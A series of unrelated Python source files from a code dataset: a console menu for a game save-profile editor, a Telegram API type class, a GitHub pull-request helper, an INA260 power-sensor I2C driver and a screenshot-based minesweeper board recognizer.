def globalMenu():
    """Render the Global menu and dispatch the pressed hotkey's action.

    Every recognized key runs its action (if any) and returns to the main
    menu; unrecognized keys are ignored.
    """
    SetConsoleTitle('SAS4Tool - Global Menu')
    mainTitle()
    for i, label in enumerate(globalMenuSelection):
        print(f'[{ascii_letters[26 + i]}] - {label}')
    sleep(0.25)
    # Hotkey -> action; None means "just go back" (the 'Back' entry).
    actions = {
        b'a': factionsOptionMenu,
        b'b': addPremiumItems,
        b'c': addRevive,
        b'd': AddNightmareTickets,
        b'e': removeAds,
        b'f': unlockProfiles,
        b'g': None,
    }
    while True:
        if kbhit():
            key = getch()
            if key in actions:
                if actions[key] is not None:
                    actions[key]()
                return mainMenu()
def profileMenu():
    """Render the Profile menu and dispatch the pressed hotkey's action.

    Key ``g`` (random Strongboxes) is a placeholder and intentionally does
    nothing; every other recognized key runs its action and returns to the
    main menu.
    """
    SetConsoleTitle('SAS4Tool - Profile Menu')
    mainTitle()
    for i, label in enumerate(profileMenuSelection):
        print(f'[{ascii_letters[26 + i]}] - {label}')
    sleep(0.25)
    # Hotkey -> action; None means "just go back". b'g' is deliberately
    # absent so the loop keeps waiting (feature is work in progress).
    actions = {
        b'a': addItemsMenu,
        b'b': changeUsername,
        b'c': addCash,
        b'd': setFreeSkillReset,
        b'e': setLevel,
        b'f': setBlackStronboxes,
        b'h': addBlackKeys,
        b'i': addAugmentCores,
        b'j': setSupportItems,
        b'k': addMultiplayerStats,
        b'l': None,
    }
    while True:
        if kbhit():
            key = getch()
            if key in actions:
                if actions[key] is not None:
                    actions[key]()
                return mainMenu()
def setProfileConfig(consoleProfileList):
    """Let the user pick a profile (hotkeys a-f) and persist it in config.json.

    Writes both ``consoleDefaultProfile`` ('Profile 1'..'Profile 6') and
    ``defaultProfile`` ('Profile0'..'Profile5').

    :param consoleProfileList: display labels for the six profiles
    """
    SetConsoleTitle('SAS4Tool - Set profile')
    mainTitle()
    print('Select a profile:\n')
    for i, label in enumerate(consoleProfileList):
        print(f'[{ascii_letters[26 + i]}] - {label}')
    sleep(0.25)
    # Hotkeys a-f map onto profile indices 0-5 (replaces six copy-pasted
    # branches from the original).
    choices = {ascii_letters[i].encode(): i for i in range(6)}
    with open('config.json', 'r+') as f:
        data = load(f)
        f.seek(0)
        f.truncate()
        while True:
            if kbhit():
                key = getch()
                if key in choices:
                    index = choices[key]
                    data['consoleDefaultProfile'] = 'Profile %d' % (index + 1)
                    data['defaultProfile'] = 'Profile%d' % index
                    dump(data, f)
                    break
def configMenu():
    """Render the Settings menu and dispatch the pressed hotkey's action.

    Entry ``c`` (backup) is a work-in-progress placeholder and just returns.
    """
    consoleProfileList = ['Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5', 'Profile 6']
    SetConsoleTitle('SAS4Tool - Config Menu')
    mainTitle()
    for i, label in enumerate(configMenuSelection):
        print(f'[{ascii_letters[26 + i]}] - {label}')
    sleep(0.25)
    # Hotkey -> action; None means "no action, just go back".
    actions = {
        b'a': lambda: setProfileConfig(consoleProfileList),
        b'b': setProfilePath,
        b'c': None,  # backup Profile.save: work in progress
        b'd': fixInventory,
        b'e': None,  # Back
    }
    while True:
        if kbhit():
            key = getch()
            if key in actions:
                if actions[key] is not None:
                    actions[key]()
                return mainMenu()
def mainMenu():
    """Render the main menu and dispatch the pressed hotkey.

    NOTE(review): submenus return to mainMenu() recursively, so a long
    session grows the call stack — kept as-is for behavioral compatibility.
    """
    SetConsoleTitle('SAS4Tool - Main Menu')
    mainTitle()
    for i, label in enumerate(mainMenuSelection):
        print(f'[{ascii_letters[26 + i]}] - {label}')
    sleep(0.25)
    # Entries whose result should be handed back directly.
    submenus = {b'a': globalMenu, b'b': profileMenu}
    # Entries that run, then redraw the main menu.
    actions = {b'c': profileManualEdit, b'd': configMenu, b'e': about}
    while True:
        if not kbhit():
            continue
        key = getch()
        if key in submenus:
            return submenus[key]()
        if key in actions:
            actions[key]()
            return mainMenu()
        if key == b'f':
            try:
                stdout.flush()
                exit()
            except BaseException:  # explicit form of the original bare except
                # exit() raises SystemExit (or NameError when frozen); either
                # way flush again and terminate hard.
                stdout.flush()
                _exit(0)
if __name__ == '__main__':
    # Default configuration written on first run.
    contents = {'version': '2.0.0', 'developer': '<\\>#0077', 'defaultProfile': 'Profile0', 'consoleDefaultProfile': 'Profile 1', "profileSavePath": ""}
    # (Re)create config.json when it is missing or empty. The short-circuit
    # keeps getsize() from running on a nonexistent file; this replaces two
    # duplicated creation branches (and a pointless `f = dump(...)` rebind).
    if not path.exists('config.json') or path.getsize('config.json') == 0:
        with open('config.json', 'w') as f:
            dump(contents, f, indent=4)
    mainMenu()
31063179375 |
from ..utils import Object
class GroupCallParticipantVideoInfo(Object):
    """
    Contains information about a group call participant's video channel

    Attributes:
        ID (:obj:`str`): ``GroupCallParticipantVideoInfo``

    Args:
        source_groups (List of :class:`telegram.api.types.groupCallVideoSourceGroup`):
            List of synchronization source groups of the video
        endpoint_id (:obj:`str`):
            Video channel endpoint identifier
        is_paused (:obj:`bool`):
            True if the video is pausedThis flag needs to be ignored, if new video frames are received

    Returns:
        GroupCallParticipantVideoInfo

    Raises:
        :class:`telegram.Error`
    """
    ID = "groupCallParticipantVideoInfo"

    def __init__(self, source_groups, endpoint_id, is_paused, **kwargs):
        # Raw API fields; extra keys in **kwargs are ignored.
        self.source_groups = source_groups  # list of groupCallVideoSourceGroup
        self.endpoint_id = endpoint_id  # str
        self.is_paused = is_paused  # bool

    @staticmethod
    def read(q: dict, *args) -> "GroupCallParticipantVideoInfo":
        """Build an instance from its dict representation."""
        return GroupCallParticipantVideoInfo(
            [Object.read(entry) for entry in q.get('source_groups', [])],
            q.get('endpoint_id'),
            q.get('is_paused'),
        )
| iTeam-co/pytglib | pytglib/api/types/group_call_participant_video_info.py | group_call_participant_video_info.py | py | 1,336 | python | en | code | 20 | github-code | 36 |
40917483210 | import requests
import json
import sys
import os
class PR():
    """Minimal client for creating GitHub pull requests and requesting reviews."""

    def __init__(self, token, user, repo) -> None:
        self.token = token
        self.user = user
        self.repo = repo

    def raise_pr(self, title, head, base):
        """Create a pull request; return its number, or -1 on failure."""
        url = "https://api.github.com/repos/{}/{}/pulls".format(self.user, self.repo)
        payload = json.dumps({
            "title": title,
            "head": head,
            "base": base
        })
        headers = {
            'Authorization': 'Bearer ' + self.token,
            'Content-Type': 'application/json'
        }
        response = requests.request("POST", url, headers=headers, data=payload)
        if response.status_code == 201:
            return response.json()["number"]
        # Surface the API error body for debugging before signalling failure.
        print(response.json())
        return -1

    def request_review(self, pr_number, reviewers):
        """Ask *reviewers* to review PR *pr_number*; return True on success."""
        print("Requesting for reviewers for PR {0}".format(pr_number))
        url = ("https://api.github.com/repos/" + self.user + "/" + self.repo
               + "/pulls/" + str(pr_number) + "/requested_reviewers")
        print(url)
        payload = {
            "reviewers": reviewers
        }
        print(payload)
        headers = {
            'Authorization': 'Bearer ' + self.token
        }
        response = requests.post(url, headers=headers, json=payload)
        return response.status_code == 201
def workflow(token, user, repo, title, head, base, reviewers):
    """Raise a pull request and request reviews on it.

    :param token: GitHub API token
    :param user: repository owner
    :param repo: repository name
    :param title: PR title
    :param head: source branch
    :param base: target branch
    :param reviewers: list of reviewer login names
    """
    pr = PR(token, user, repo)
    pr_number = pr.raise_pr(title, head, base)
    if pr_number == -1:
        print("PULL_REQUEST ERROR unable to raise a PR")
        # BUG FIX: the original fell through and requested reviews on
        # pr_number == -1; abort instead.
        return
    if not pr.request_review(pr_number, reviewers):
        print("REVIEW_REQUEST ERROR unable to add reviewer to the PR")
if __name__ == '__main__':
    # argv: token user repo title head base comma-separated-reviewers
    if len(sys.argv) < 8:
        print("Usage: python3 main.py <token> <user> <repo> <pull request title> <pull request head> <pull request base> <pull request reviewers>")
        sys.exit(1)
    workflow(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7].split(","))
| ajayk007/UI_release | raise_pr.py | raise_pr.py | py | 2,156 | python | en | code | 0 | github-code | 36 |
3204985173 | '''
TI INA260 Current Logging (I2C-register-based)
Datasheet: http://www.ti.com/lit/ds/symlink/ina260.pdf?ts=1590430404379
I2C address: 0x44
'''
import smbus
import time
class INA260:
    """Minimal I2C driver for the TI INA260 current/voltage monitor.

    Datasheet: http://www.ti.com/lit/ds/symlink/ina260.pdf
    """

    # INA260 register addresses
    __REG_CONFIG = 0x00
    __REG_CURRENT = 0x01
    __REG_BUS_VOLTAGE_ADDR = 0x02

    # Scale factors: one raw LSB corresponds to 1.25 (mV / mA).
    BUS_VOLTAGE_LSB = 1.25
    CURRENT_LSB = 1.25

    def __init__(self, i2c_addr, verbose=False):
        """Open I2C bus 1 and remember the device address.

        :param i2c_addr: 7-bit I2C address of the INA260 (e.g. 0x40)
        :param verbose: stored for callers; not used internally
        """
        try:
            self.bus = smbus.SMBus(1)
        except Exception:
            # Narrowed from a bare except. NOTE(review): on failure self.bus
            # stays unset and later reads raise AttributeError — kept to
            # preserve the original behavior.
            print('Error occured when opening bus')
        self.INA260_I2C_ADDR = i2c_addr
        self.verbose = verbose

    def twos_compliment_to_int(self, val, len):
        """Interpret *val* as a two's-complement integer of *len* bits.

        (The parameter name ``len`` shadows the builtin; kept for
        backward compatibility with existing callers.)
        """
        if val & (1 << len - 1):
            val = val - (1 << len)
        return val

    def reset(self):
        """Set the reset bit in the configuration register."""
        self.bus.write_i2c_block_data(self.INA260_I2C_ADDR, self.__REG_CONFIG,
                                      [0x80, 0x00])

    def get_bus_voltage(self):
        """Return the bus voltage in volts."""
        raw_vbus = self.bus.read_i2c_block_data(
            self.INA260_I2C_ADDR, self.__REG_BUS_VOLTAGE_ADDR, 2)
        data_vbus = raw_vbus[0] * 256 + raw_vbus[1]
        return float(data_vbus) / 1000.0 * self.BUS_VOLTAGE_LSB

    def get_current(self):
        """Return the measured current in milliamperes (signed)."""
        raw_current = self.bus.read_i2c_block_data(
            self.INA260_I2C_ADDR, self.__REG_CURRENT, 2)
        data_current = raw_current[0] * 256 + raw_current[1]
        if data_current >> 15:
            # Sign bit set: negative current.
            val_current = float(self.twos_compliment_to_int(
                data_current, 16)) / 1000.0 * self.CURRENT_LSB
        else:
            val_current = float(data_current) / 1000.0 * self.CURRENT_LSB
        return val_current * 1000
if __name__ == '__main__':
    # Manual smoke test: poll the sensor at 0x40 twice per second, forever.
    ina = INA260(i2c_addr=0x40, verbose=True)
    while True:
        print("Voltage: {:.4f} | Current: {:.4f}".format(ina.get_bus_voltage(), ina.get_current()))
        time.sleep(0.5)
| rasisbuldan/ta-shop | data-acq/ina260/ina260.py | ina260.py | py | 2,210 | python | en | code | 2 | github-code | 36 |
16140910097 | """
Recognizes the mine board from screenshot.
"""
import os
import sys
import numpy as np
from scipy.spatial.distance import cdist
import cv2
from PIL import Image
from solverutils import CID
import pyautogui as pg
# Directory holding the cell/label template images used for recognition.
IMGDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'imgs')
# related to board cells localization
DOTS_TOL = 200  # the max allowed template matching difference
# related to open cell recognition
OPEN_THR = 153  # the brightness between digit (122) and background (188)
# related to remaining mines digit recognition
# Each column scores one digit 0-9 against 7 on/off probes taken from the
# label crop; values are +/-1 so a matrix product measures agreement.
MR_LOOKUPTABLE = np.array([
    [1, 0, 1, 1, 0, 1, 1, 1, 1, 1],
    [0, 0, 1, 1, 1, 1, 1, 0, 1, 1],
    [1, 0, 1, 1, 0, 1, 1, 0, 1, 1],
    [1, 0, 0, 0, 1, 1, 1, 0, 1, 1],
    [1, 0, 1, 0, 0, 0, 1, 0, 1, 0],
    [1, 1, 1, 1, 1, 0, 0, 1, 1, 1],
    [1, 1, 0, 1, 1, 1, 1, 1, 1, 1],
]) * 2 - 1
# related to remaining mines digit recognition
MR_UNITS = np.array([100, 10, 1])  # place values of the three label digits
def normalize(image):
    """
    Normalize a uint8 image to [-1.0, 1.0].
    """
    # x/128 - 1 is exactly (x - 128)/128 for integer x in [0, 255].
    return image.astype(np.float64) / 128 - 1.0
def tobw(img, threshold):
    """Threshold *img* into a black-and-white uint8 image (0 or 255)."""
    mask = img.astype(np.int64) >= threshold
    return (mask * 255).astype(np.uint8)
def loadimg(filename: str):
    """
    Load image as grayscale from ``IMGDIR``.

    :param filename: the image filename
    :return: a uint8 image
    """
    grayscale = Image.open(os.path.join(IMGDIR, filename)).convert('L')
    return np.asarray(grayscale)
def get_rect_midpoint(top_left, shape):
    """Midpoint (x, y) of the rect at *top_left* with (height, width) = shape[:2]."""
    x0, y0 = top_left[0], top_left[1]
    return np.array([x0 + shape[1] // 2, y0 + shape[0] // 2])
def make_screenshot(sct, monitor=None, region=None, esc_before_grab=False):
    """
    Make uint8 grayscale screenshot of specified region on specified monitor.

    :param sct: the ``mss.mss()`` instance
    :param monitor: ``None`` for the first monitor, positive integer for the
           monitor of that id, and dict for that monitor
    :type monitor: Union[None, int, dict]
    :param region: ``None`` for the entire region, and dict for the specified
           region plus the offset imposed by the specified monitor
    :param esc_before_grab: press Esc key before grabbing to temporarily hide
           the mouse cursor
    :return: numpy array of the grayscale screenshot
    """
    if isinstance(monitor, int):
        monitor = sct.monitors[monitor]
    elif not monitor:
        monitor = sct.monitors[1]
    if esc_before_grab:
        # Esc hides the cursor so it does not occlude the board cells.
        pg.press('esc')
    if region:
        # Region coordinates are monitor-relative; shift into global space.
        adjusted_region = region.copy()
        adjusted_region['top'] += monitor['top']
        adjusted_region['left'] += monitor['left']
        img = sct.grab(adjusted_region)
    else:
        img = sct.grab(monitor)
    # mss returns BGRA bytes; round-trip through PIL to get grayscale.
    img = Image.frombytes('RGB', img.size, img.bgra, 'raw', 'BGRX')
    return np.asarray(img.convert('L'))
class BoardNotFoundError(Exception):
    """Raised when the board cells cannot be segmented out correctly."""
class BoardDetector:
    """
    Locates the minesweeper board (and optionally the remaining-mines label)
    on screen and recognizes cell contents by template matching.

    Attributes (note: the x-y coordinate complies to image convention):
    - ``upper``: the smallest y coordinate of the board (readonly)
    - ``lower``: the largest y coordinate of the board (readonly)
    - ``left``: the smallest x coordinate of the board (readonly)
    - ``right``: the largest x coordinate of the board (readonly)
    - ``height``: the number of cells along each column (readonly)
    - ``width``: the number of cells along each row (readonly)
    - ``hkls``: horizontal key lines of the cell board
    - ``vkls``: vertical key lines of the cell board
    Below attributes may be ``None`` if ``enable_mr_detect=False`` when
    ``new``:
    - ``upper_mr``: the smallest y coordinate of the remaining mines label
    - ``lower_mr``: the largest y coordinate of the remaining mines label
    - ``left_mr``: the smallest x coordinate of the remaining mines label
    - ``right_mr``: the largest x coordinate of the remaining mines label
    """
    def __init__(self, mon_id, dpr, hkls, vkls, upper_mr, lower_mr, left_mr,
                 right_mr):
        """
        This method shouldn't be called explicitly; use ``new`` instead.
        """
        # the monitor id
        self.mon_id = mon_id
        # the device pixel ratio (x, y)
        self.dpr = dpr
        # the cell board key lines
        self.hkls = hkls
        self.vkls = vkls
        # the remaining mines label location
        self.upper_mr = upper_mr
        self.lower_mr = lower_mr
        self.left_mr = left_mr
        self.right_mr = right_mr
        # precomputed board region and remaining mines region
        self.board_region = {
            'top': self.upper,  # self.upper is a property
            'left': self.left,  # same
            'width': self.right - self.left,  # same
            'height': self.lower - self.upper,  # same
        }
        if self.upper_mr is not None:
            self.mr_region = {
                'top': self.upper_mr // self.dpr[1],
                'left': self.left_mr // self.dpr[0],
                'width': (self.right_mr - self.left_mr) // self.dpr[0],
                'height': (self.lower_mr - self.upper_mr) // self.dpr[1],
            }
        else:
            self.mr_region = None
        # precomputed offset hkls and vkls, i.e. the key lines with respect
        # to the upper left corner of the board region
        self.offset_hkls = self.hkls - self.hkls[0]
        self.offset_vkls = self.vkls - self.vkls[0]
        # preload various cells: digits 0-8 (thresholded), then the special
        # faces (flag, exploded/misflagged/revealed mine, blank)
        loaded_imgs = [
            tobw(loadimg('open{}.gif'.format(i)), OPEN_THR)
            for i in range(0, 9)
        ]
        loaded_imgs.extend(
            map(loadimg, [
                'bombflagged.gif', 'bombdeath.gif', 'bombmisflagged.gif',
                'bombrevealed.gif', 'blank.gif'
            ]))
        # Flatten each template into a [-1, 1] row vector for cdist matching.
        self._face_templates = np.stack(loaded_imgs).astype(np.float64)
        self._face_templates = self._face_templates / 255 * 2 - 1
        self._face_templates = self._face_templates.reshape(
            self._face_templates.shape[0], -1)
        # Cell-id for each template row, parallel to _face_templates.
        self._face_templates_cids = [
            0,
            1,
            2,
            3,
            4,
            5,
            6,
            7,
            8,
            CID['f'],
            CID['m'],
            CID['m'],
            CID['m'],
            CID['q'],
        ]
    @property
    def upper(self):
        return self.hkls[0] // self.dpr[1]
    @property
    def lower(self):
        return self.hkls[-1] // self.dpr[1]
    @property
    def left(self):
        return self.vkls[0] // self.dpr[0]
    @property
    def right(self):
        return self.vkls[-1] // self.dpr[0]
    @property
    def height(self):
        """Board height, not pixel height"""
        return self.hkls.size - 1
    @property
    def width(self):
        """Board width, not pixel width"""
        return self.vkls.size - 1
    def __str__(self):
        return ('{0.__class__.__name__}('
                'mon_id={0.mon_id}, '
                'dpr={0.dpr}, '
                'hkls={0.hkls}, '
                'vkls={0.vkls}, '
                'upper_mr={0.upper_mr}, '
                'lower_mr={0.lower_mr}, '
                'left_mr={0.left_mr}, '
                'right_mr={0.right_mr})'.format(self))
    def __repr__(self):
        return ('{0.__class__.__name__}('
                'mon_id={0.mon_id} '
                'dpr={0.dpr}, '
                'hkls={0.hkls!r}, '
                'vkls={0.vkls!r}, '
                'upper_mr={0.upper_mr!r}, '
                'lower_mr={0.lower_mr!r}, '
                'left_mr={0.left_mr!r}, '
                'right_mr={0.right_mr!r})'.format(self))
    @classmethod
    def new(cls, mon_screenshots, enable_mr_detect=False):
        """
        Try every pair of (monitor id, monitor resolution, screenshot) until
        one returns an instance of ``BoardDetector``.

        :param mon_screenshots: list of tuples of (monitor id, monitor
               resolution (width, height), the uint8 grayscale screenshot
               possibly containing an empty board)
        :param enable_mr_detect: if ``True``, enable mines remaining detection
        :return: a ``BoardDetector`` object
        :raise BoardNotFoundError: if until the last monitor ``BoardDetector``
               is not instantiated successfully
        """
        total_num = len(mon_screenshots)
        for i, (mon_id, mon_res, screenshot) in enumerate(mon_screenshots, 1):
            try:
                return cls._new(mon_id, mon_res, screenshot, enable_mr_detect)
            except BoardNotFoundError:
                # Only re-raise once every candidate monitor has failed.
                if i == total_num:
                    raise
    @classmethod
    def _new(cls, mon_id: int, mon_res, screenshot: np.ndarray,
             enable_mr_detect):
        """
        Returns a new instance of ``BoardDetector`` from ``screenshot``.

        :param mon_id: the monitor id
        :param mon_res: the monitor resolution (width, height)
        :param screenshot: the uint8 grayscale screenshot containing an empty
               board
        :param enable_mr_detect: if ``True``, enable mines remaining detection
        :return: a ``BoardDetector`` object
        :raise BoardNotFoundError:
        """
        # COMPUTE DEVICE PIXEL RATIO
        dpr_x = screenshot.shape[1] // mon_res[0]
        dpr_y = screenshot.shape[0] // mon_res[1]
        # LOCALIZE CELL BOARD: find all cell-corner crosses by template match
        crosstmpl = loadimg('b_crs.png')
        mmr = cv2.matchTemplate(screenshot, crosstmpl,
                                cv2.TM_SQDIFF) <= DOTS_TOL
        dots = np.stack(np.nonzero(mmr), axis=1)
        if dots.size == 0:
            raise BoardNotFoundError('no board cross is found')
        u0, cnt0 = np.unique(dots[:, 0], return_counts=True)
        u1, cnt1 = np.unique(dots[:, 1], return_counts=True)
        # remove outliers: keep only rows/columns with the modal cross count
        cnt0_e, cnt0_c = np.unique(cnt0, return_counts=True)
        cnt0_mode = cnt0_e[np.argmax(cnt0_c)]
        cnt1_e, cnt1_c = np.unique(cnt1, return_counts=True)
        cnt1_mode = cnt1_e[np.argmax(cnt1_c)]
        to_delete = [
            np.where(dots[:, 0] == x)[0] for x in u0[cnt0 < cnt0_mode]
        ] + [np.where(dots[:, 1] == x)[0] for x in u1[cnt1 < cnt1_mode]]
        if to_delete:
            dots = np.delete(
                dots, np.unique(np.concatenate(to_delete)), axis=0)
        ch_ = np.unique(np.diff(np.unique(dots[:, 0])))  # cell intervals y
        cw_ = np.unique(np.diff(np.unique(dots[:, 1])))  # cell intervals x
        # allow one unique dot interval or two successive dot intervals due
        # to rounding error
        if not ((ch_.size == 1 or
                 (ch_.size == 2 and abs(ch_[0] - ch_[1]) == 1)) and
                (cw_.size == 1 or
                 (cw_.size == 2 and abs(cw_[0] - cw_[1]) == 1))):
            raise BoardNotFoundError('board crosses are not localized '
                                     'correctly')
        # the horizontal (arranged along matrix axis=0) key lines,
        # extrapolated by one interval at each end to cover the border cells
        hkls = np.unique(dots[:, 0])
        hkls = np.concatenate((
            [hkls[0] - (hkls[1] - hkls[0])],
            hkls,
            [hkls[-1] + (hkls[-1] - hkls[-2])],
        )) + 1
        # the vertical (arranged along matrix axis=1) key lines
        vkls = np.unique(dots[:, 1])
        vkls = np.concatenate((
            [vkls[0] - (vkls[1] - vkls[0])],
            vkls,
            [vkls[-1] + (vkls[-1] - vkls[-2])],
        )) + 1
        if not enable_mr_detect:
            return cls(mon_id, (dpr_x, dpr_y), hkls, vkls, None, None, None,
                       None)
        left = vkls[0]
        right = vkls[-1]
        # LOCALIZE MINE REMAINING LABEL via its three corner templates
        mrlltmpl = loadimg('mr_ll.png')
        mrlrtmpl = loadimg('mr_lr.png')
        mrultmpl = loadimg('mr_ul.png')
        MR_TOL = 50
        mrllloc = np.stack(
            np.nonzero(
                cv2.matchTemplate(screenshot, mrlltmpl, cv2.TM_SQDIFF) <=
                MR_TOL),
            axis=1)
        mrlrloc = np.stack(
            np.nonzero(
                cv2.matchTemplate(screenshot, mrlrtmpl, cv2.TM_SQDIFF) <=
                MR_TOL),
            axis=1)
        mrulloc = np.stack(
            np.nonzero(
                cv2.matchTemplate(screenshot, mrultmpl, cv2.TM_SQDIFF) <=
                MR_TOL),
            axis=1)
        # The label sits left of the board center; drop matches to the right.
        mrlrloc = np.delete(
            mrlrloc, np.where(mrlrloc[:, 1] >= np.mean((left, right))), axis=0)
        mrulloc = np.delete(
            mrulloc, np.where(mrulloc[:, 1] >= np.mean((left, right))), axis=0)
        # Snap near-misses (off by one pixel) onto the board's left edge.
        if mrllloc.size > 0 and abs(mrllloc[0, 1] - left + 1) <= 1:
            mrllloc[0, 1] = left - 1
        if mrulloc.size > 0 and abs(mrulloc[0, 1] - left + 1) <= 1:
            mrulloc[0, 1] = left - 1
        if (any(x.shape[0] != 1 for x in (mrllloc, mrlrloc, mrulloc))
                or mrllloc[0, 1] != left - 1 or mrllloc[0, 0] != mrlrloc[0, 0]
                or mrulloc[0, 1] != left - 1):
            raise BoardNotFoundError('remaining mines label is not localized '
                                     'correctly')
        lower_mr, left_mr = mrllloc[0] + 1
        upper_mr = mrulloc[0, 0] + 1
        right_mr = mrlrloc[0, 1] + 1
        return cls(mon_id, (dpr_x, dpr_y), hkls, vkls, upper_mr, lower_mr,
                   left_mr, right_mr)
    def recognize_board_and_mr(self, sct):
        """Grab the screen and return (cells, mines_remaining, board_image).

        ``mines_remaining`` is ``None`` unless label detection was enabled.
        """
        boardimg, mrimg = self.localize_board_and_mr(sct)
        cellimgs = self.get_cells_from_board(boardimg)
        cells = self.recognize_cells(cellimgs)
        if self.upper_mr is None:
            mr = None
        else:
            mr = self.recognize_mr_digits(mrimg)
        return cells, mr, boardimg
    @staticmethod
    def recognize_mr_digits(roi_gray):
        """Decode the three digits of the remaining-mines label crop.

        Samples a fixed probe grid over the crop and matches the on/off
        pattern against ``MR_LOOKUPTABLE`` (assumes a 3-digit label —
        see ``MR_UNITS``).
        """
        region = roi_gray > 50
        vert = np.linspace(0, region.shape[1], 7, dtype=np.int64)
        hori = np.linspace(0, region.shape[0], 5, dtype=np.int64)
        vresults = np.split(region[:, vert[1::2]], hori[1::2], axis=0)
        hresults = np.split(region[hori[1::2], :], vert[1:-1], axis=1)
        vresults = np.stack([np.sum(x, axis=0) > 0 for x in vresults], axis=1)
        hresults = np.stack([np.sum(x, axis=1) > 0 for x in hresults])
        hresults = hresults.reshape((3, 4))
        results = np.concatenate((vresults, hresults), axis=1).astype(np.int64)
        # Best-matching digit per position via a +/-1 agreement score.
        digits = np.argmax(np.matmul(results * 2 - 1, MR_LOOKUPTABLE), axis=1)
        return np.dot(digits, MR_UNITS)
    def localize_board_and_mr(self, sct):
        """
        Returns ``(cell_board_image, mine_remaining_image)`` if
        ``enable_mr_detect`` was ``True`` when calling ``new`` to construct
        this ``BoardDetector``; otherwise, returns
        ``(cell_board_image, None)``.
        """
        boardimg = make_screenshot(sct, self.mon_id, self.board_region,
                                   esc_before_grab=True)
        if self.upper_mr is None:
            return boardimg, None
        mrimg = make_screenshot(sct, self.mon_id, self.mr_region)
        return boardimg, mrimg
    def get_cells_from_board(self, boardimg):
        """Slice *boardimg* along the key lines into a stack of cell images."""
        cells = []
        for i in range(self.offset_hkls.size - 1):
            for j in range(self.offset_vkls.size - 1):
                # yapf: disable
                c = boardimg[self.offset_hkls[i]:self.offset_hkls[i + 1],
                             self.offset_vkls[j]:self.offset_vkls[j + 1]]
                # yapf: enable
                cells.append(np.copy(c))
        cells = np.stack(cells)
        return cells
    def recognize_cells(self, cells):
        """Classify each cell image by nearest template; return a (height,
        width) array of cell ids."""
        cells = np.stack(
            [tobw(cv2.resize(x, (16, 16)), OPEN_THR) for x in cells])
        cells = cells.astype(np.float64) / 255 * 2 - 1
        cells = cells.reshape((cells.shape[0], -1))
        D = cdist(self._face_templates, cells)
        predictions = np.argmin(D, axis=0)
        predictions = [self._face_templates_cids[x] for x in predictions]
        predictions = np.array(predictions).reshape((self.height, self.width))
        return predictions
    def boardloc_as_pixelloc(self, blocs):
        """
        Convert a batch of board locations to a batch of pixel locations. Note
        that in the board coordinate x axis is from the upper left corner to
        the lower left corner and the y axis is from the upper left corner to
        the upper right corner; whereas in the pixel coordinate x axis is from
        the upper left corner to the upper right corner, etc.

        :param blocs: of form (array([...], dtype=int), array([...], dtype=int)
               where the first array is the board x coordinates, and the
               second array the board y coordinates
        :return: pixel coordinates of the same form as ``blocs``
        """
        bx, by = blocs
        py = ((self.hkls[bx] + self.hkls[bx + 1]) / 2).astype(int)
        px = ((self.vkls[by] + self.vkls[by + 1]) / 2).astype(int)
        return px, py
    @staticmethod
    def _cc_dist(query, templates):
        """Smallest absolute difference between *query* and any template."""
        return min(
            abs(x.astype(np.int64) - query.astype(np.int64))
            for x in templates)
# pylint: disable=too-few-public-methods
class StageIdentifier:
    """Classifies a screenshot plus recognized board as win / lost / ongoing."""

    def identify_stage(self, scr, board):
        """
        :param scr: should be an array of shape (H, W), of dtype uint8
        :param board: the recognized board
        """
        min_white_ratio = 1 / 3  # minimum required ratio of white pixels
        sample_size = 32  # size of center crop
        assert scr.shape[0] > sample_size and scr.shape[1] > sample_size
        top = (scr.shape[0] - sample_size) // 2
        left = (scr.shape[1] - sample_size) // 2
        crop = scr[top:top + sample_size, left:left + sample_size]
        # A winning message floods the crop's center with white pixels.
        if np.sum(crop > 250) / crop.size > min_white_ratio:
            return 'win'
        # Any visible mine on the board means the game was lost.
        if np.any(board == CID['m']):
            return 'lost'
        return 'ongoing'
def _main():
    """CLI driver: grab (or load) a screenshot, detect the board, and print
    the recognized cells, remaining mines and stage.

    Note: ``argparse`` and ``mss`` are imported in the ``__main__`` guard.
    """
    parser = argparse.ArgumentParser(
        description='Recognize board from screenshot.')
    parser.add_argument(
        '-R',
        dest='empty_board',
        type=os.path.normpath,
        help='recognize from screenshot given EMPTY_BOARD in '
        'scene if specified; otherwise, localize board '
        'and mine remaining label from screenshot')
    parser.add_argument(
        '-D',
        dest='empty_board_monitor',
        type=int,
        default=1,
        help='the monitor id of the empty_board')
    parser.add_argument(
        '-b',
        type=os.path.normpath,
        dest='board_tofile',
        metavar='FILE',
        help='if specified, the board image will be saved to '
        'FILE')
    parser.add_argument(
        '-m',
        type=os.path.normpath,
        dest='mr_tofile',
        metavar='FILE',
        help='if specified, the mine remaining image will be '
        'saved to FILE')
    parser.add_argument(
        '-C',
        type=os.path.normpath,
        dest='cellnpy_tofile',
        metavar='FILE',
        help='if specified, the cell images are zipped in an npy FILE')
    args = parser.parse_args()
    with mss.mss() as sct:
        def get_mon_resolution(_mon_id):
            # Resolution of monitor _mon_id as (width, height).
            _mon = sct.monitors[_mon_id]
            return _mon['width'], _mon['height']
        if not args.empty_board:
            # No file given: try every attached monitor in turn.
            empty_board = [(i, get_mon_resolution(i), make_screenshot(sct, i))
                           for i in range(1, len(sct.monitors))]
        else:
            empty_board = [
                (
                    args.empty_board_monitor,
                    get_mon_resolution(args.empty_board_monitor),
                    np.asarray(Image.open(args.empty_board).convert('L')),
                ),
            ]
        bd = BoardDetector.new(empty_board, True)
        boardimg, mrimg = bd.localize_board_and_mr(sct)
        if args.board_tofile:
            Image.fromarray(boardimg).save(args.board_tofile)
        if args.mr_tofile:
            Image.fromarray(mrimg).save(args.mr_tofile)
        print('The board:')
        board = bd.recognize_cells(bd.get_cells_from_board(boardimg))
        np.savetxt(sys.stdout, board, fmt='%d', delimiter=',')
        print('Mines remaining:')
        print(bd.recognize_mr_digits(mrimg))
        print('Winning state:')
        print(StageIdentifier().identify_stage(boardimg, board))
        if args.cellnpy_tofile:
            np.save(args.cellnpy_tofile, bd.get_cells_from_board(boardimg))
    print(bd)
if __name__ == '__main__':
    # Deferred imports: argparse/mss are only needed when run as a script.
    import argparse
    import mss
    _main()
| kkew3/sat-minesweeper | vboard.py | vboard.py | py | 20,542 | python | en | code | 6 | github-code | 36 |
21609680031 | from contextlib import contextmanager
import sys
import os
import tempfile
from shutil import rmtree
from os import getcwd, chdir
from os.path import join, basename, dirname, isdir, abspath, sep
import unittest
import six
from six.moves import reload_module
